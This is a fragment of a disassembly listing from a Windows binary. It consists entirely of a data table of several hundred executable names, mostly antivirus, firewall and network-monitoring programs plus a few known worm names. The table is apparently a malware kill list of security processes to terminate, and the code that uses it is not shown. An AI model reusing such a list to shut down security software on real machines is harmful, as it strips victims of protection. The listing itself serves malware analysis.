aNetutils_exe db 'NETUTILS.EXE',0 ; DATA XREF: .data:0042A964�o
align 4
aNetstat_exe db 'NETSTAT.EXE',0 ; DATA XREF: .data:0042A960�o
aNetspyhunter1_ db 'NETSPYHUNTER-1.2.EXE',0 ; DATA XREF: .data:0042A95C�o
align 10h
aNetscanpro_exe db 'NETSCANPRO.EXE',0 ; DATA XREF: .data:0042A958�o
align 10h
aNetmon_exe db 'NETMON.EXE',0 ; DATA XREF: .data:0042A954�o
align 4
aNetinfo_exe db 'NETINFO.EXE',0 ; DATA XREF: .data:0042A950�o
aNetd32_exe db 'NETD32.EXE',0 ; DATA XREF: .data:0042A94C�o
align 4
aNetarmor_exe db 'NETARMOR.EXE',0 ; DATA XREF: .data:0042A948�o
align 4
aNeowatchlog_ex db 'NEOWATCHLOG.EXE',0 ; DATA XREF: .data:0042A944�o
aNeomonitor_exe db 'NEOMONITOR.EXE',0 ; DATA XREF: .data:0042A940�o
align 4
aNdd32_exe db 'NDD32.EXE',0 ; DATA XREF: .data:0042A93C�o
align 10h
aNcinst4_exe db 'NCINST4.EXE',0 ; DATA XREF: .data:0042A938�o
aNc2000_exe db 'NC2000.EXE',0 ; DATA XREF: .data:0042A934�o
align 4
aNavwnt_exe db 'NAVWNT.EXE',0 ; DATA XREF: .data:0042A930�o
align 4
aNavw32_exe db 'NAVW32.EXE',0 ; DATA XREF: .data:0042A92C�o
align 10h
aNavstub_exe db 'NAVSTUB.EXE',0 ; DATA XREF: .data:0042A928�o
aNavnt_exe db 'NAVNT.EXE',0 ; DATA XREF: .data:0042A924�o
align 4
aNavlu32_exe db 'NAVLU32.EXE',0 ; DATA XREF: .data:0042A920�o
aNavengnavex15_ db 'NAVENGNAVEX15.NAVLU32.EXE',0 ; DATA XREF: .data:0042A91C�o
align 10h
aNavdx_exe db 'NAVDX.EXE',0 ; DATA XREF: .data:0042A918�o
align 4
aNavapw32_exe db 'NAVAPW32.EXE',0 ; DATA XREF: .data:0042A914�o
align 4
aNavapsvc_exe db 'NAVAPSVC.EXE',0 ; DATA XREF: .data:0042A910�o
align 4
aNavap_navapsvc db 'NAVAP.NAVAPSVC.EXE',0 ; DATA XREF: .data:0042A90C�o
align 10h
aAutoProtect_na db 'AUTO-PROTECT.NAV80TRY.EXE',0 ; DATA XREF: .data:0042A908�o
align 4
aNav_exe db 'NAV.EXE',0 ; DATA XREF: .data:0042A904�o
aN32scanw_exe db 'N32SCANW.EXE',0 ; DATA XREF: .data:0042A900�o
align 4
aMwatch_exe db 'MWATCH.EXE',0 ; DATA XREF: .data:0042A8FC�o
align 10h
aMu0311ad_exe db 'MU0311AD.EXE',0 ; DATA XREF: .data:0042A8F8�o
align 10h
aMsvxd_exe db 'MSVXD.EXE',0 ; DATA XREF: .data:0042A8F4�o
align 4
aMssys_exe db 'MSSYS.EXE',0 ; DATA XREF: .data:0042A8F0�o
align 4
aMssmmc32_exe db 'MSSMMC32.EXE',0 ; DATA XREF: .data:0042A8EC�o
align 4
aMsmsgri32_exe db 'MSMSGRI32.EXE',0 ; DATA XREF: .data:0042A8E8�o
align 4
aMsmgt_exe db 'MSMGT.EXE',0 ; DATA XREF: .data:0042A8E4�o
align 4
aMslaugh_exe db 'MSLAUGH.EXE',0 ; DATA XREF: .data:0042A8E0�o
aMsinfo32_exe db 'MSINFO32.EXE',0 ; DATA XREF: .data:0042A8DC�o
align 10h
aMsiexec16_exe db 'MSIEXEC16.EXE',0 ; DATA XREF: .data:0042A8D8�o
align 10h
aMsdos_exe db 'MSDOS.EXE',0 ; DATA XREF: .data:0042A8D4�o
align 4
aMsdm_exe db 'MSDM.EXE',0 ; DATA XREF: .data:0042A8D0�o
align 4
aMsconfig_exe_0 db 'MSCONFIG.EXE',0 ; DATA XREF: .data:0042A8CC�o
align 4
aMscman_exe db 'MSCMAN.EXE',0 ; DATA XREF: .data:0042A8C8�o
align 4
aMsccn32_exe db 'MSCCN32.EXE',0 ; DATA XREF: .data:0042A8C4�o
aMscache_exe db 'MSCACHE.EXE',0 ; DATA XREF: .data:0042A8C0�o
aMsblast_exe db 'MSBLAST.EXE',0 ; DATA XREF: .data:0042A8BC�o
aMsbb_exe db 'MSBB.EXE',0 ; DATA XREF: .data:0042A8B8�o
align 4
aMsapp_exe db 'MSAPP.EXE',0 ; DATA XREF: .data:0042A8B4�o
align 10h
aMrflux_exe db 'MRFLUX.EXE',0 ; DATA XREF: .data:0042A8B0�o
align 4
aMpftray_exe db 'MPFTRAY.EXE',0 ; DATA XREF: .data:0042A8AC�o
aMpfservice_exe db 'MPFSERVICE.EXE',0 ; DATA XREF: .data:0042A8A8�o
align 4
aMpfagent_exe db 'MPFAGENT.EXE',0 ; DATA XREF: .data:0042A8A4�o
align 4
aMostat_exe db 'MOSTAT.EXE',0 ; DATA XREF: .data:0042A8A0�o
align 4
aMoolive_exe db 'MOOLIVE.EXE',0 ; DATA XREF: .data:0042A89C�o
aMonitor_exe db 'MONITOR.EXE',0 ; DATA XREF: .data:0042A898�o
aMmod_exe db 'MMOD.EXE',0 ; DATA XREF: .data:0042A894�o
align 4
aMinilog_exe db 'MINILOG.EXE',0 ; DATA XREF: .data:0042A890�o
aMgui_exe db 'MGUI.EXE',0 ; DATA XREF: .data:0042A88C�o
align 10h
aMghtml_exe db 'MGHTML.EXE',0 ; DATA XREF: .data:0042A888�o
align 4
aMgavrte_exe db 'MGAVRTE.EXE',0 ; DATA XREF: .data:0042A884�o
aMgavrtcl_exe db 'MGAVRTCL.EXE',0 ; DATA XREF: .data:0042A880�o
align 4
aMfweng3_02d30_ db 'MFWENG3.02D30.EXE',0 ; DATA XREF: .data:0042A87C�o
align 4
aMfw2en_exe db 'MFW2EN.EXE',0 ; DATA XREF: .data:0042A878�o
align 4
aMfin32_exe db 'MFIN32.EXE',0 ; DATA XREF: .data:0042A874�o
align 4
aMd_exe db 'MD.EXE',0 ; DATA XREF: .data:0042A870�o
align 4
aMcvsshld_exe db 'MCVSSHLD.EXE',0 ; DATA XREF: .data:0042A86C�o
align 4
aMcvsrte_exe db 'MCVSRTE.EXE',0 ; DATA XREF: .data:0042A868�o
aMcupdate_exe db 'MCUPDATE.EXE',0 ; DATA XREF: .data:0042A860�o
; .data:0042A864�o
align 4
aMctool_exe db 'MCTOOL.EXE',0 ; DATA XREF: .data:0042A85C�o
align 4
aMcshield_exe db 'MCSHIELD.EXE',0 ; DATA XREF: .data:0042A858�o
align 4
aMcmnhdlr_exe db 'MCMNHDLR.EXE',0 ; DATA XREF: .data:0042A854�o
align 4
aMcagent_exe db 'MCAGENT.EXE',0 ; DATA XREF: .data:0042A850�o
aMapisvc32_exe db 'MAPISVC32.EXE',0 ; DATA XREF: .data:0042A84C�o
align 10h
aLuspt_exe db 'LUSPT.EXE',0 ; DATA XREF: .data:0042A848�o
align 4
aLuinit_exe db 'LUINIT.EXE',0 ; DATA XREF: .data:0042A844�o
align 4
aLucomserver_ex db 'LUCOMSERVER.EXE',0 ; DATA XREF: .data:0042A840�o
aLuau_exe db 'LUAU.EXE',0 ; DATA XREF: .data:0042A83C�o
align 4
aLuall_exe db 'LUALL.EXE',0 ; DATA XREF: .data:0042A834�o
; .data:0042A838�o
align 10h
aLsetup_exe db 'LSETUP.EXE',0 ; DATA XREF: .data:0042A830�o
align 4
aLordpe_exe db 'LORDPE.EXE',0 ; DATA XREF: .data:0042A82C�o
align 4
aLookout_exe db 'LOOKOUT.EXE',0 ; DATA XREF: .data:0042A828�o
aLockdown2000_e db 'LOCKDOWN2000.EXE',0 ; DATA XREF: .data:0042A824�o
align 4
aLockdown_exe db 'LOCKDOWN.EXE',0 ; DATA XREF: .data:0042A820�o
align 4
aLocalnet_exe db 'LOCALNET.EXE',0 ; DATA XREF: .data:0042A81C�o
align 4
aLoader_exe db 'LOADER.EXE',0 ; DATA XREF: .data:0042A818�o
align 4
aLnetinfo_exe db 'LNETINFO.EXE',0 ; DATA XREF: .data:0042A814�o
align 4
aLdscan_exe db 'LDSCAN.EXE',0 ; DATA XREF: .data:0042A810�o
align 10h
aLdpromenu_exe db 'LDPROMENU.EXE',0 ; DATA XREF: .data:0042A80C�o
align 10h
aLdpro_exe db 'LDPRO.EXE',0 ; DATA XREF: .data:0042A808�o
align 4
aLdnetmon_exe db 'LDNETMON.EXE',0 ; DATA XREF: .data:0042A804�o
align 4
aLauncher_exe db 'LAUNCHER.EXE',0 ; DATA XREF: .data:0042A800�o
align 4
aKillprocessset db 'KILLPROCESSSETUP161.EXE',0 ; DATA XREF: .data:0042A7FC�o
aKernel32_exe db 'KERNEL32.EXE',0 ; DATA XREF: .data:0042A7F8�o
align 4
aKerioWrp421EnW db 'KERIO-WRP-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042A7F4�o
align 10h
aKerioWrl421EnW db 'KERIO-WRL-421-EN-WIN.EXE',0 ; DATA XREF: .data:0042A7F0�o
align 4
aKerioPf213EnWi db 'KERIO-PF-213-EN-WIN.EXE',0 ; DATA XREF: .data:0042A7EC�o
aKeenvalue_exe db 'KEENVALUE.EXE',0 ; DATA XREF: .data:0042A7E8�o
align 4
aKazza_exe db 'KAZZA.EXE',0 ; DATA XREF: .data:0042A7E4�o
align 10h
aKavpf_exe db 'KAVPF.EXE',0 ; DATA XREF: .data:0042A7E0�o
align 4
aKavpers40eng_e db 'KAVPERS40ENG.EXE',0 ; DATA XREF: .data:0042A7DC�o
align 10h
aKavlite40eng_e db 'KAVLITE40ENG.EXE',0 ; DATA XREF: .data:0042A7D8�o
align 4
aJedi_exe db 'JEDI.EXE',0 ; DATA XREF: .data:0042A7D4�o
align 10h
aJdbgmrg_exe db 'JDBGMRG.EXE',0 ; DATA XREF: .data:0042A7D0�o
aJammer_exe db 'JAMMER.EXE',0 ; DATA XREF: .data:0042A7CC�o
align 4
aIstsvc_exe db 'ISTSVC.EXE',0 ; DATA XREF: .data:0042A7C8�o
align 4
aIsrv95_exe db 'ISRV95.EXE',0 ; DATA XREF: .data:0042A7C4�o
align 10h
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .data:0042A7C0�o
align 4
aIris_exe db 'IRIS.EXE',0 ; DATA XREF: .data:0042A7BC�o
align 4
aIparmor_exe db 'IPARMOR.EXE',0 ; DATA XREF: .data:0042A7B8�o
aIomon98_exe db 'IOMON98.EXE',0 ; DATA XREF: .data:0042A7B4�o
aIntren_exe db 'INTREN.EXE',0 ; DATA XREF: .data:0042A7B0�o
align 4
aIntdel_exe db 'INTDEL.EXE',0 ; DATA XREF: .data:0042A7AC�o
align 4
aInit_exe db 'INIT.EXE',0 ; DATA XREF: .data:0042A7A8�o
align 4
aInfwin_exe db 'INFWIN.EXE',0 ; DATA XREF: .data:0042A7A4�o
align 10h
aInfus_exe db 'INFUS.EXE',0 ; DATA XREF: .data:0042A7A0�o
align 4
aInetlnfo_exe db 'INETLNFO.EXE',0 ; DATA XREF: .data:0042A79C�o
align 4
aIfw2000_exe db 'IFW2000.EXE',0 ; DATA XREF: .data:0042A798�o
aIface_exe db 'IFACE.EXE',0 ; DATA XREF: .data:0042A794�o
align 4
aIexplorer_exe db 'IEXPLORER.EXE',0 ; DATA XREF: .data:0042A790�o
align 4
aIedriver_exe db 'IEDRIVER.EXE',0 ; DATA XREF: .data:0042A78C�o
align 4
aIedll_exe db 'IEDLL.EXE',0 ; DATA XREF: .data:0042A788�o
align 10h
aIdle_exe db 'IDLE.EXE',0 ; DATA XREF: .data:0042A784�o
align 4
aIcsuppnt_exe db 'ICSUPPNT.EXE',0 ; DATA XREF: .data:0042A780�o
align 4
aIcsupp95_exe db 'ICSUPP95.EXE',0 ; DATA XREF: .data:0042A778�o
; .data:0042A77C�o
align 4
aIcmon_exe db 'ICMON.EXE',0 ; DATA XREF: .data:0042A774�o
align 4
aIcloadnt_exe db 'ICLOADNT.EXE',0 ; DATA XREF: .data:0042A770�o
align 4
aIcload95_exe db 'ICLOAD95.EXE',0 ; DATA XREF: .data:0042A76C�o
align 4
aIbmavsp_exe db 'IBMAVSP.EXE',0 ; DATA XREF: .data:0042A768�o
aIbmasn_exe db 'IBMASN.EXE',0 ; DATA XREF: .data:0042A764�o
align 10h
aIamstats_exe db 'IAMSTATS.EXE',0 ; DATA XREF: .data:0042A760�o
align 10h
aIamserv_exe db 'IAMSERV.EXE',0 ; DATA XREF: .data:0042A75C�o
aIamapp_exe db 'IAMAPP.EXE',0 ; DATA XREF: .data:0042A758�o
align 4
aHxiul_exe db 'HXIUL.EXE',0 ; DATA XREF: .data:0042A754�o
align 4
aHxdl_exe db 'HXDL.EXE',0 ; DATA XREF: .data:0042A750�o
align 10h
aHwpe_exe db 'HWPE.EXE',0 ; DATA XREF: .data:0042A74C�o
align 4
aHtpatch_exe db 'HTPATCH.EXE',0 ; DATA XREF: .data:0042A748�o
aHtlog_exe db 'HTLOG.EXE',0 ; DATA XREF: .data:0042A744�o
align 4
aHotpatch_exe db 'HOTPATCH.EXE',0 ; DATA XREF: .data:0042A740�o
align 4
aHotactio_exe db 'HOTACTIO.EXE',0 ; DATA XREF: .data:0042A73C�o
align 4
aHbsrv_exe db 'HBSRV.EXE',0 ; DATA XREF: .data:0042A738�o
align 10h
aHbinst_exe db 'HBINST.EXE',0 ; DATA XREF: .data:0042A734�o
align 4
aHacktracersetu db 'HACKTRACERSETUP.EXE',0 ; DATA XREF: .data:0042A730�o
aGuarddog_exe db 'GUARDDOG.EXE',0 ; DATA XREF: .data:0042A72C�o
align 10h
aGuard_exe db 'GUARD.EXE',0 ; DATA XREF: .data:0042A728�o
align 4
aGmt_exe db 'GMT.EXE',0 ; DATA XREF: .data:0042A724�o
aGenerics_exe db 'GENERICS.EXE',0 ; DATA XREF: .data:0042A720�o
align 4
aGbpoll_exe db 'GBPOLL.EXE',0 ; DATA XREF: .data:0042A71C�o
align 10h
aGbmenu_exe db 'GBMENU.EXE',0 ; DATA XREF: .data:0042A718�o
align 4
aGator_exe db 'GATOR.EXE',0 ; DATA XREF: .data:0042A714�o
align 4
aFsmb32_exe db 'FSMB32.EXE',0 ; DATA XREF: .data:0042A710�o
align 4
aFsma32_exe db 'FSMA32.EXE',0 ; DATA XREF: .data:0042A70C�o
align 10h
aFsm32_exe db 'FSM32.EXE',0 ; DATA XREF: .data:0042A708�o
align 4
aFsgk32_exe db 'FSGK32.EXE',0 ; DATA XREF: .data:0042A704�o
align 4
aFsav95_exe db 'FSAV95.EXE',0 ; DATA XREF: .data:0042A700�o
align 4
aFsav530wtbyb_e db 'FSAV530WTBYB.EXE',0 ; DATA XREF: .data:0042A6FC�o
align 4
aFsav530stbyb_e db 'FSAV530STBYB.EXE',0 ; DATA XREF: .data:0042A6F8�o
align 4
aFsav32_exe db 'FSAV32.EXE',0 ; DATA XREF: .data:0042A6F4�o
align 4
aFsav_exe db 'FSAV.EXE',0 ; DATA XREF: .data:0042A6F0�o
align 4
aFsaa_exe db 'FSAA.EXE',0 ; DATA XREF: .data:0042A6EC�o
align 10h
aFrw_exe db 'FRW.EXE',0 ; DATA XREF: .data:0042A6E8�o
aFprot_exe db 'FPROT.EXE',0 ; DATA XREF: .data:0042A6E4�o
align 4
aFpWin_trial_ex db 'FP-WIN_TRIAL.EXE',0 ; DATA XREF: .data:0042A6E0�o
align 4
aFpWin_exe db 'FP-WIN.EXE',0 ; DATA XREF: .data:0042A6DC�o
align 4
aFnrb32_exe db 'FNRB32.EXE',0 ; DATA XREF: .data:0042A6D8�o
align 10h
aFlowprotector_ db 'FLOWPROTECTOR.EXE',0 ; DATA XREF: .data:0042A6D4�o
align 4
aFirewall_exe db 'FIREWALL.EXE',0 ; DATA XREF: .data:0042A6D0�o
align 4
aFindviru_exe db 'FINDVIRU.EXE',0 ; DATA XREF: .data:0042A6CC�o
align 4
aFih32_exe db 'FIH32.EXE',0 ; DATA XREF: .data:0042A6C8�o
align 10h
aFch32_exe db 'FCH32.EXE',0 ; DATA XREF: .data:0042A6C4�o
align 4
aFast_exe db 'FAST.EXE',0 ; DATA XREF: .data:0042A6C0�o
align 4
aFameh32_exe db 'FAMEH32.EXE',0 ; DATA XREF: .data:0042A6BC�o
aFStopw_exe db 'F-STOPW.EXE',0 ; DATA XREF: .data:0042A6B8�o
aFProt95_exe db 'F-PROT95.EXE',0 ; DATA XREF: .data:0042A6B4�o
align 10h
aFProt_exe db 'F-PROT.EXE',0 ; DATA XREF: .data:0042A6B0�o
align 4
aFAgnt95_exe db 'F-AGNT95.EXE',0 ; DATA XREF: .data:0042A6AC�o
align 4
aExplore_exe db 'EXPLORE.EXE',0 ; DATA XREF: .data:0042A6A8�o
aExpert_exe db 'EXPERT.EXE',0 ; DATA XREF: .data:0042A6A4�o
align 4
aExe_avxw_exe db 'EXE.AVXW.EXE',0 ; DATA XREF: .data:0042A6A0�o
align 4
aExantivirusCne db 'EXANTIVIRUS-CNET.EXE',0 ; DATA XREF: .data:0042A69C�o
align 4
aEvpn_exe db 'EVPN.EXE',0 ; DATA XREF: .data:0042A698�o
align 4
aEtrustcipe_exe db 'ETRUSTCIPE.EXE',0 ; DATA XREF: .data:0042A694�o
align 4
aEthereal_exe db 'ETHEREAL.EXE',0 ; DATA XREF: .data:0042A690�o
align 4
aEspwatch_exe db 'ESPWATCH.EXE',0 ; DATA XREF: .data:0042A68C�o
align 4
aEscanv95_exe db 'ESCANV95.EXE',0 ; DATA XREF: .data:0042A688�o
align 4
aEscanhnt_exe db 'ESCANHNT.EXE',0 ; DATA XREF: .data:0042A684�o
align 4
aEscanh95_exe db 'ESCANH95.EXE',0 ; DATA XREF: .data:0042A680�o
align 4
aEsafe_exe db 'ESAFE.EXE',0 ; DATA XREF: .data:0042A67C�o
align 4
aEnt_exe db 'ENT.EXE',0 ; DATA XREF: .data:0042A678�o
aEmsw_exe db 'EMSW.EXE',0 ; DATA XREF: .data:0042A674�o
align 4
aEfpeadm_exe db 'EFPEADM.EXE',0 ; DATA XREF: .data:0042A670�o
aEcengine_exe db 'ECENGINE.EXE',0 ; DATA XREF: .data:0042A66C�o
align 4
aDvp95_0_exe db 'DVP95_0.EXE',0 ; DATA XREF: .data:0042A668�o
aDvp95_exe db 'DVP95.EXE',0 ; DATA XREF: .data:0042A664�o
align 4
aDssagent_exe db 'DSSAGENT.EXE',0 ; DATA XREF: .data:0042A660�o
align 4
aDrwebupw_exe db 'DRWEBUPW.EXE',0 ; DATA XREF: .data:0042A65C�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .data:0042A658�o
aDrwatson_exe db 'DRWATSON.EXE',0 ; DATA XREF: .data:0042A654�o
align 4
aDpps2_exe db 'DPPS2.EXE',0 ; DATA XREF: .data:0042A650�o
align 4
aDpfsetup_exe db 'DPFSETUP.EXE',0 ; DATA XREF: .data:0042A64C�o
align 4
aDpf_exe db 'DPF.EXE',0 ; DATA XREF: .data:0042A648�o
aDoors_exe db 'DOORS.EXE',0 ; DATA XREF: .data:0042A644�o
align 4
aDllreg_exe db 'DLLREG.EXE',0 ; DATA XREF: .data:0042A640�o
align 4
aDllcache_exe db 'DLLCACHE.EXE',0 ; DATA XREF: .data:0042A63C�o
align 4
aDivx_exe db 'DIVX.EXE',0 ; DATA XREF: .data:0042A638�o
align 10h
aDeputy_exe db 'DEPUTY.EXE',0 ; DATA XREF: .data:0042A634�o
align 4
aDefwatch_exe db 'DEFWATCH.EXE',0 ; DATA XREF: .data:0042A630�o
align 4
aDefscangui_exe db 'DEFSCANGUI.EXE',0 ; DATA XREF: .data:0042A62C�o
align 4
aDefalert_exe db 'DEFALERT.EXE',0 ; DATA XREF: .data:0042A628�o
align 4
aDcomx_exe db 'DCOMX.EXE',0 ; DATA XREF: .data:0042A624�o
align 4
aDatemanager_ex db 'DATEMANAGER.EXE',0 ; DATA XREF: .data:0042A620�o
aClaw95_exe db 'Claw95.EXE',0 ; DATA XREF: .data:0042A618�o
align 4
aCwntdwmo_exe db 'CWNTDWMO.EXE',0 ; DATA XREF: .data:0042A614�o
align 4
aCwnb181_exe db 'CWNB181.EXE',0 ; DATA XREF: .data:0042A610�o
aCv_exe db 'CV.EXE',0 ; DATA XREF: .data:0042A60C�o
align 4
aCtrl_exe db 'CTRL.EXE',0 ; DATA XREF: .data:0042A608�o
align 4
aCpfnt206_exe db 'CPFNT206.EXE',0 ; DATA XREF: .data:0042A604�o
align 4
aCpf9x206_exe db 'CPF9X206.EXE',0 ; DATA XREF: .data:0042A600�o
align 4
aCpd_exe db 'CPD.EXE',0 ; DATA XREF: .data:0042A5FC�o
aConnectionmoni db 'CONNECTIONMONITOR.EXE',0 ; DATA XREF: .data:0042A5F8�o
align 4
aCmon016_exe db 'CMON016.EXE',0 ; DATA XREF: .data:0042A5F4�o
aCmgrdian_exe db 'CMGRDIAN.EXE',0 ; DATA XREF: .data:0042A5F0�o
align 10h
aCmesys_exe db 'CMESYS.EXE',0 ; DATA XREF: .data:0042A5EC�o
align 4
aCmd32_exe db 'CMD32.EXE',0 ; DATA XREF: .data:0042A5E8�o
align 4
aClick_exe db 'CLICK.EXE',0 ; DATA XREF: .data:0042A5E4�o
align 4
aCleanpc_exe db 'CLEANPC.EXE',0 ; DATA XREF: .data:0042A5E0�o
aCleaner3_exe db 'CLEANER3.EXE',0 ; DATA XREF: .data:0042A5DC�o
align 10h
aCleaner_exe db 'CLEANER.EXE',0 ; DATA XREF: .data:0042A5D8�o
aClean_exe db 'CLEAN.EXE',0 ; DATA XREF: .data:0042A5D4�o
align 4
aClaw95cf_exe db 'CLAW95CF.EXE',0 ; DATA XREF: .data:0042A5D0�o
; .data:0042A61C�o
align 4
aCfinet32_exe db 'CFINET32.EXE',0 ; DATA XREF: .data:0042A5CC�o
align 4
aCfinet_exe db 'CFINET.EXE',0 ; DATA XREF: .data:0042A5C8�o
align 4
aCfiaudit_exe db 'CFIAUDIT.EXE',0 ; DATA XREF: .data:0042A5C0�o
; .data:0042A5C4�o
align 4
aCfiadmin_exe db 'CFIADMIN.EXE',0 ; DATA XREF: .data:0042A5BC�o
align 4
aCfgwiz_exe db 'CFGWIZ.EXE',0 ; DATA XREF: .data:0042A5B8�o
align 10h
aCfd_exe db 'CFD.EXE',0 ; DATA XREF: .data:0042A5B4�o
aCdp_exe db 'CDP.EXE',0 ; DATA XREF: .data:0042A5B0�o
aCcpxysvc_exe db 'CCPXYSVC.EXE',0 ; DATA XREF: .data:0042A5AC�o
align 10h
aCcevtmgr_exe db 'CCEVTMGR.EXE',0 ; DATA XREF: .data:0042A5A8�o
align 10h
aCcapp_exe db 'CCAPP.EXE',0 ; DATA XREF: .data:0042A5A4�o
align 4
aBvt_exe db 'BVT.EXE',0 ; DATA XREF: .data:0042A5A0�o
aBundle_exe db 'BUNDLE.EXE',0 ; DATA XREF: .data:0042A59C�o
align 10h
aBs120_exe db 'BS120.EXE',0 ; DATA XREF: .data:0042A598�o
align 4
aBrasil_exe db 'BRASIL.EXE',0 ; DATA XREF: .data:0042A594�o
align 4
aBpc_exe db 'BPC.EXE',0 ; DATA XREF: .data:0042A590�o
aBorg2_exe db 'BORG2.EXE',0 ; DATA XREF: .data:0042A58C�o
align 4
aBootwarn_exe db 'BOOTWARN.EXE',0 ; DATA XREF: .data:0042A588�o
align 4
aBootconf_exe db 'BOOTCONF.EXE',0 ; DATA XREF: .data:0042A584�o
align 4
aBlss_exe db 'BLSS.EXE',0 ; DATA XREF: .data:0042A580�o
align 4
aBlackice_exe db 'BLACKICE.EXE',0 ; DATA XREF: .data:0042A57C�o
align 4
aBlackd_exe db 'BLACKD.EXE',0 ; DATA XREF: .data:0042A578�o
align 4
aBisp_exe db 'BISP.EXE',0 ; DATA XREF: .data:0042A574�o
align 10h
aBipcpevalsetup db 'BIPCPEVALSETUP.EXE',0 ; DATA XREF: .data:0042A570�o
align 4
aBipcp_exe db 'BIPCP.EXE',0 ; DATA XREF: .data:0042A56C�o
align 10h
aBidserver_exe db 'BIDSERVER.EXE',0 ; DATA XREF: .data:0042A568�o
align 10h
aBidef_exe db 'BIDEF.EXE',0 ; DATA XREF: .data:0042A564�o
align 4
aBelt_exe db 'BELT.EXE',0 ; DATA XREF: .data:0042A560�o
align 4
aBeagle_exe db 'BEAGLE.EXE',0 ; DATA XREF: .data:0042A55C�o
align 4
aBd_professiona db 'BD_PROFESSIONAL.EXE',0 ; DATA XREF: .data:0042A558�o
aBargains_exe db 'BARGAINS.EXE',0 ; DATA XREF: .data:0042A554�o
align 4
aBackweb_exe db 'BACKWEB.EXE',0 ; DATA XREF: .data:0042A550�o
aAvxquar_exe db 'AVXQUAR.EXE',0 ; DATA XREF: .data:0042A548�o
; .data:0042A54C�o
aAvxmonitornt_e db 'AVXMONITORNT.EXE',0 ; DATA XREF: .data:0042A544�o
align 4
aAvxmonitor9x_e db 'AVXMONITOR9X.EXE',0 ; DATA XREF: .data:0042A540�o
align 4
aAvwupsrv_exe db 'AVWUPSRV.EXE',0 ; DATA XREF: .data:0042A53C�o
align 4
aAvwupd32_exe db 'AVWUPD32.EXE',0 ; DATA XREF: .data:0042A534�o
; .data:0042A538�o
align 4
aAvwupd_exe db 'AVWUPD.EXE',0 ; DATA XREF: .data:0042A530�o
align 4
aAvwinnt_exe db 'AVWINNT.EXE',0 ; DATA XREF: .data:0042A52C�o
aAvwin95_exe db 'AVWIN95.EXE',0 ; DATA XREF: .data:0042A528�o
aAvsynmgr_exe db 'AVSYNMGR.EXE',0 ; DATA XREF: .data:0042A524�o
align 4
aAvsched32_exe db 'AVSCHED32.EXE',0 ; DATA XREF: .data:0042A520�o
align 4
aAvpupd_exe db 'AVPUPD.EXE',0 ; DATA XREF: .data:0042A518�o
; .data:0042A51C�o
align 4
aAvptc32_exe db 'AVPTC32.EXE',0 ; DATA XREF: .data:0042A514�o
aAvpm_exe db 'AVPM.EXE',0 ; DATA XREF: .data:0042A510�o
align 10h
aAvpdos32_exe db 'AVPDOS32.EXE',0 ; DATA XREF: .data:0042A50C�o
align 10h
aAvpcc_exe db 'AVPCC.EXE',0 ; DATA XREF: .data:0042A508�o
align 4
aAvp32_exe db 'AVP32.EXE',0 ; DATA XREF: .data:0042A504�o
align 4
aAvp_exe db 'AVP.EXE',0 ; DATA XREF: .data:0042A500�o
aAvnt_exe db 'AVNT.EXE',0 ; DATA XREF: .data:0042A4FC�o
align 4
aAvltmain_exe db 'AVLTMAIN.EXE',0 ; DATA XREF: .data:0042A4F8�o
align 4
aAvkwctl9_exe db 'AVKWCTl9.EXE',0 ; DATA XREF: .data:0042A4F4�o
align 4
aAvkservice_exe db 'AVKSERVICE.EXE',0 ; DATA XREF: .data:0042A4F0�o
align 4
aAvkserv_exe db 'AVKSERV.EXE',0 ; DATA XREF: .data:0042A4EC�o
aAvkpop_exe db 'AVKPOP.EXE',0 ; DATA XREF: .data:0042A4E8�o
align 4
aAvgw_exe db 'AVGW.EXE',0 ; DATA XREF: .data:0042A4E4�o
align 10h
aAvguard_exe db 'AVGUARD.EXE',0 ; DATA XREF: .data:0042A4E0�o
aAvgserv9_exe db 'AVGSERV9.EXE',0 ; DATA XREF: .data:0042A4DC�o
align 4
aAvgserv_exe db 'AVGSERV.EXE',0 ; DATA XREF: .data:0042A4D8�o
aAvgnt_exe db 'AVGNT.EXE',0 ; DATA XREF: .data:0042A4D4�o
align 4
aAvgctrl_exe db 'AVGCTRL.EXE',0 ; DATA XREF: .data:0042A4D0�o
aAvgcc32_exe db 'AVGCC32.EXE',0 ; DATA XREF: .data:0042A4CC�o
aAve32_exe db 'AVE32.EXE',0 ; DATA XREF: .data:0042A4C8�o
align 4
aAvconsol_exe db 'AVCONSOL.EXE',0 ; DATA XREF: .data:0042A4C4�o
align 4
aAutoupdate_exe db 'AUTOUPDATE.EXE',0 ; DATA XREF: .data:0042A4C0�o
align 4
aAutotrace_exe db 'AUTOTRACE.EXE',0 ; DATA XREF: .data:0042A4BC�o
align 4
aAutodown_exe db 'AUTODOWN.EXE',0 ; DATA XREF: .data:0042A4B8�o
align 4
aAupdate_exe db 'AUPDATE.EXE',0 ; DATA XREF: .data:0042A4B4�o
aAu_exe db 'AU.EXE',0 ; DATA XREF: .data:0042A4B0�o
align 4
aAtwatch_exe db 'ATWATCH.EXE',0 ; DATA XREF: .data:0042A4AC�o
aAtupdater_exe db 'ATUPDATER.EXE',0 ; DATA XREF: .data:0042A4A4�o
; .data:0042A4A8�o
align 4
aAtro55en_exe db 'ATRO55EN.EXE',0 ; DATA XREF: .data:0042A4A0�o
align 4
aAtguard_exe db 'ATGUARD.EXE',0 ; DATA XREF: .data:0042A49C�o
aAtcon_exe db 'ATCON.EXE',0 ; DATA XREF: .data:0042A498�o
align 10h
aArr_exe db 'ARR.EXE',0 ; DATA XREF: .data:0042A494�o
aApvxdwin_exe db 'APVXDWIN.EXE',0 ; DATA XREF: .data:0042A490�o
align 4
aAplica32_exe db 'APLICA32.EXE',0 ; DATA XREF: .data:0042A48C�o
align 4
aApimonitor_exe db 'APIMONITOR.EXE',0 ; DATA XREF: .data:0042A488�o
align 4
aAnts_exe db 'ANTS.EXE',0 ; DATA XREF: .data:0042A484�o
align 4
aAntivirus_exe db 'ANTIVIRUS.EXE',0 ; DATA XREF: .data:0042A480�o
align 4
aAntiTrojan_exe db 'ANTI-TROJAN.EXE',0 ; DATA XREF: .data:0042A47C�o
aAmon9x_exe db 'AMON9X.EXE',0 ; DATA XREF: .data:0042A478�o
align 10h
aAlogserv_exe db 'ALOGSERV.EXE',0 ; DATA XREF: .data:0042A474�o
align 10h
aAlevir_exe db 'ALEVIR.EXE',0 ; DATA XREF: .data:0042A470�o
align 4
aAlertsvc_exe db 'ALERTSVC.EXE',0 ; DATA XREF: .data:0042A46C�o
align 4
